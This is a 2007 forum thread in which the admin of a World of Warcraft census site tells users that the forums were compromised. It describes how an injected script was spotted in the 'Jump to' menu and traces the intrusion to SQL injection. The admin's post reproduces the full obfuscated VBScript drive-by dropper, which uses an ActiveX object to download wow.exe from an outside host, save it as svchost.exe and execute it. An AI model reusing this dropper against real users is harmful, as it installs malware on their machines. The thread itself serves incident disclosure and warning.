WarcraftReamls.com
  FAQFAQ    SearchSearch    MemberlistMemberlist    UsergroupsUsergroups   RegisterRegister 
  ProfileProfile    Log in to check your private messagesLog in to check your private messages    Log inLog in 
Forum "jump to" menuproblem

 
Post new topic   Reply to topic    WarcraftRealms.com Forum Index -> WarcraftRealms.com Bugs
View previous topic :: View next topic  
Author Message
Tartara



Joined: 20 Dec 2005
Posts: 90
Location: Tucson, AZ
WR Updates: 844,914
Tartara WR Profile

PostPosted: Thu Aug 16, 2007 6:59 am    Post subject: Forum "jump to" menuproblem Reply with quote

On forum pages that have a drop-down "Jump to" menu at the bottom, I'm getting a weird error that's causing the page to render with a width about ten times my screen size! The problem seems to be an item in the drop-down menu where some javascript is appearing verbatim. I've taken a screenshot in the hopes you can track it down.


My browser is Safari 2.0.4 on Mac OS X 10.4.10
_________________

and the rest
Back to top
View user's profile Send private message
DM.
Census Tester


Joined: 03 Oct 2005
Posts: 1155
Location: Toronto, Canada
WR Updates: 841,833
DM. WR Profile

PostPosted: Thu Aug 16, 2007 10:46 am    Post subject: Reply with quote

You mean there's more browsers than just Firefox? Shocked
_________________

Click my sig
Back to top
View user's profile Send private message
Skyfire
Trolling Enforcement


Joined: 18 Aug 2005
Posts: 746
Location: New Jersey
WR Updates: 44,279
Skyfire WR Profile

PostPosted: Thu Aug 16, 2007 12:30 pm    Post subject: Reply with quote

So long as (s)he's using anything other than IE, its good with me.
_________________
Admin on WoWWiki
Moderator, Blogger on Wowhead
Back to top
View user's profile Send private message
Tartara



Joined: 20 Dec 2005
Posts: 90
Location: Tucson, AZ
WR Updates: 844,914
Tartara WR Profile

PostPosted: Thu Aug 16, 2007 12:38 pm    Post subject: Reply with quote

DM. wrote:
You mean there's more browsers than just Firefox? Shocked


It's okay - I'm using Firefox at work! I haven't used IE in months (years?), unless I need to for testing purposes, and then I have to borrow someone else's computer to do so. When Microsoft decided to stop offering IE for Mac, no-one was happier than me Smile
_________________

and the rest
Back to top
View user's profile Send private message
Tartara



Joined: 20 Dec 2005
Posts: 90
Location: Tucson, AZ
WR Updates: 844,914
Tartara WR Profile

PostPosted: Thu Aug 16, 2007 5:41 pm    Post subject: Reply with quote

Additional information:

Here's the source of the problematic option tag (replace {} with <>)
{option value="-1"}General{script src=http://www.exponentialsl.com/tags/css.js}{/script}{/option}
The homepage of that domain looks a little dodgy - any idea why the script is in there, Rollie?
_________________

and the rest
Back to top
View user's profile Send private message
Tartara



Joined: 20 Dec 2005
Posts: 90
Location: Tucson, AZ
WR Updates: 844,914
Tartara WR Profile

PostPosted: Thu Aug 16, 2007 6:09 pm    Post subject: Reply with quote

Hm, not liking what I see here. Looking at that script sitting quietly in the Jump to: menu (which I'd never have noticed if Safari hadn't helpfully displayed it to me) I see a few disturbing things including a mention of svchost.exe which - according to http://www.liutilities.com/products/wintaskspro/processlibrary/svchost/ - is a BAD BAD THING. Any javascript wizzes around here want to look at it?

A quick google turns up just one other site referencing exponentialsl.com - and that's in some title tags on wowstatus.net, a site dedicated to spreading information on WoW private servers. Razz

The script shows up in the source of these forums in Firefox too, though without the visible code in the menu, which makes me think perhaps it's actually running. Lucky I'm on a Mac! Any of you reading these forums with Windows, you might want to hold off for a bit. And run your virus/trojan scanners.

Rollie, I hope you haven't been hacked! Shocked
_________________

and the rest
Back to top
View user's profile Send private message
Skyfire
Trolling Enforcement


Joined: 18 Aug 2005
Posts: 746
Location: New Jersey
WR Updates: 44,279
Skyfire WR Profile

PostPosted: Thu Aug 16, 2007 11:53 pm    Post subject: Reply with quote

<a href="http://www.google.com/search?hl=en&q=svchost.exe&btnG=Google+Search">Google</a> says svchost is fine. the ones that are issues are those that are made to look like svchost, like svch0st, or scvhost, etc.
_________________
Admin on WoWWiki
Moderator, Blogger on Wowhead
Back to top
View user's profile Send private message
Rollie
Site Admin


Joined: 28 Nov 2004
Posts: 5374
Location: Austin, TX
WR Updates: 480,131
Rollie WR Profile

PostPosted: Fri Aug 17, 2007 1:06 pm    Post subject: Reply with quote

ok, I'm out of town and on my laptop, digging into it as best I can for now. If nothing else, I may shut the forums down until I return.

Course if I do, you won't likely be able to read this =)
Back to top
View user's profile Send private message Visit poster's website
Rollie
Site Admin


Joined: 28 Nov 2004
Posts: 5374
Location: Austin, TX
WR Updates: 480,131
Rollie WR Profile

PostPosted: Fri Aug 17, 2007 1:16 pm    Post subject: Reply with quote

Well, I was able to remove the offending entry. Unfortunately it means I have been compromised to some degree here. It could be as minor as the admin account having been hacked, to as major as my actual server being hacked. Unfortunately there is no way to know when this happened.

I'm still researching what it was doing exactly as I'm sure it was no good...
Back to top
View user's profile Send private message Visit poster's website
Rollie
Site Admin


Joined: 28 Nov 2004
Posts: 5374
Location: Austin, TX
WR Updates: 480,131
Rollie WR Profile

PostPosted: Fri Aug 17, 2007 1:51 pm    Post subject: Reply with quote

This is what it looks like it was trying to run. From what little research I've done, it appears that it is trying to download a file, wow.exe from the exponentialsl.com site. My best guess is that this is a trojan, keylogger. I would strongly recommend all users update their virus scanners and do a fresh check.

Quote:

<script>
on error resume next
t1= "http:\/\/"
t2= "www."
t3= "expone"
t4= "ntialsl"
t5= ".com"
t6= "\/wow"
t7= ".exe"
tcsafe = t1&t2&t3&t4&t5&t6&t7
m11="o"
m12="bj"
m13="ect"
m1=m11&m12&m13
m21="cl"
m22="ass"
m23="id"
m2= m21&m22&m23
m31="clsid:"
m32="BD96C556"
m33="-65A3-"
m34="11D0-983A"
m35="-00C04F"
m36="C29E36"
m3=m31&m32&m33&m34&m35&m36

m41="Microsoft"
m42=".XML"
m43="HTTP"
m4=m41&m42&m43

m51="Shel"
m52="l.App"
m53="lication"
m5=m51&m52&m53

m61="Scrip"
m62="ting.Fi"
m63="leSyst"
m64="emObject"
m6=m61&m62&m63&m64

sub tcsafe2exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="open"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub

Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3

Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="GET"
Xd.Open Xh, tcsafe, False
Xd.Send
X9="svchost.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
Xa.open
X9= Xb.BuildPath(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe2exe(m5,X9)
</script>


At this point I'm not sure how the intruder got in or how serious the invasion is. I am embarrassed and saddened by this news.

As far as I can tell only IE users or other browsers with installed ActiveX components were at risk. I will do more research as I can and will relay information as it becomes available.

I'm sorry =(
Back to top
View user's profile Send private message Visit poster's website
WyriHaximus



Joined: 18 Oct 2005
Posts: 244
Location: Koedijk, Alkmaar, Noord-Holland, The Netherlands
WR Updates: 1,520,754
WyriHaximus WR Profile

PostPosted: Fri Aug 17, 2007 3:27 pm    Post subject: Reply with quote

Wow that is a nasty little bugger :O! I hope your updated your software properly like a good developer should know Rollie Razz.
_________________

My World of Warcraft Screenshots / Map
Back to top
View user's profile Send private message Visit poster's website
Balgair
Araiceil


Joined: 30 Sep 2005
Posts: 1483
Location: UK
WR Updates: 10,829,931
Balgair WR Profile

PostPosted: Fri Aug 17, 2007 6:12 pm    Post subject: Reply with quote

Eep, not good Confused Only wow.exe files on my computer are the real thing, but updating and running virus/antispyware scans anyway to be on the safe side - I'm pretty sure I have my IE locked down to be safe from keyloggers etc but still gonna double-check to be sure!
_________________
EU-Draenor:
-- Sagart - Tairbh - Buinne - Balgair - Eilnich - Ruire - Dubh - Laidir - Naomh --
Back to top
View user's profile Send private message
Rollie
Site Admin


Joined: 28 Nov 2004
Posts: 5374
Location: Austin, TX
WR Updates: 480,131
Rollie WR Profile

PostPosted: Sun Aug 19, 2007 6:56 pm    Post subject: Reply with quote

So I think I've tracked down some more details. It appears that the individual(s) responsible basically used an SQL injection attack to give themselves admin accounts on WCR. Using these admin accounts, they were able to put the scripts into the Category names.

I now face the daunting task of trying to figure out where they were able to successfully launch the SQL injection attack and snuff it out.

I believe this incident occurred around 8/14 midnight as that is when the account that gave access was created. I have disabled/banned the accounts and removed the admin rights. I'll also be modifying the phpbb code to disallow that type of thing from occurring again in the future.
Back to top
View user's profile Send private message Visit poster's website
heartless_



Joined: 09 Jan 2005
Posts: 134

WR Updates: 182,172
heartless_ WR Profile

PostPosted: Mon Aug 20, 2007 8:22 pm    Post subject: Reply with quote

Sorry to hear about it man, but at least you were honest about it and have a clue as to how to fix it. I've seen things like this happen on guild run forums and it is disastrous.
_________________


Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    WarcraftRealms.com Forum Index -> WarcraftRealms.com Bugs All times are GMT - 6 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
WarcraftRealms.com  


Powered by phpBB © 2001, 2005 phpBB Group